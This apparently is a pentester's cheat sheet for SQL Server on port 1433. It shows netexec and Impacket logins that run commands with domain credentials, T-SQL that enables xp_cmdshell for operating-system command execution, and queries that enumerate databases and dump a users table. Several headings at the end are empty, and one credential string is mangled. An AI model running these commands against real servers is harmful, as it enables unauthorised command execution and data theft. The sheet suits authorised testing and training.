MSSQL (TCP 1433)

# netexec: authenticate to the MSSQL service with domain credentials and run the command given to -x
netexec mssql 10.10.10.101 -d domain -u adot8 -p password -x "whoami"
# mssqlclient.py (Impacket): interactive client using Windows (domain) authentication
# NOTE(review): the credential@host part was mangled by the page extraction ("[email protected]");
# the expected form is domain.local/<user>:<password>@<host> -- confirm against the source
mssqlclient.py -p 1433 domain.local/adot8:[email protected] -windows-auth

Configure xp_cmdshell

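-- Enable xp_cmdshell (OS command execution through SQL Server).
-- Prerequisite: the login needs ALTER SETTINGS (sysadmin / serveradmin).
-- Each sp_configure change is written to the SQL Server error log as a
-- "Configuration option ... changed" entry, which is the event defenders
-- monitor for; RECONFIGURE applies the pending value.
-- EXECUTE is required: a stored procedure may be called without it only as
-- the first statement of a batch, so the bare form breaks once these
-- statements are run together. The original also misspelled EXECUTE and
-- left the xp_cmdshell string literal unterminated.
EXECUTE sp_configure 'show advanced options', '1';
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', '1';
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';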

Enumeration

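-- Server and database enumeration (T-SQL).
-- <databaseName> is a placeholder for one of the databases listed below.
SELECT @@version;
-- Both catalogs list databases: sys.databases is the current catalog view,
-- master..sysdatabases the legacy compatibility view.
SELECT name FROM sys.databases;
SELECT name FROM master..sysdatabases;
USE adot8;
-- Explicit column list instead of SELECT * on the INFORMATION_SCHEMA view.
SELECT TABLE_SCHEMA, TABLE_NAME FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
-- xtype = 'U' restricts sysobjects to user tables (e.g. a users table).
SELECT name FROM <databaseName>..sysobjects WHERE xtype = 'U';
-- Columns are unknown until the table is inspected, so * is kept here.
-- <databaseName>.dbo.users and <databaseName>..users normally resolve to the
-- same table (the two-dot form uses the default schema, usually dbo).
SELECT * FROM <databaseName>.dbo.users;
SELECT * FROM <databaseName>..users;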

Impersonate a user

Capture hash

Read a file

Copy a file
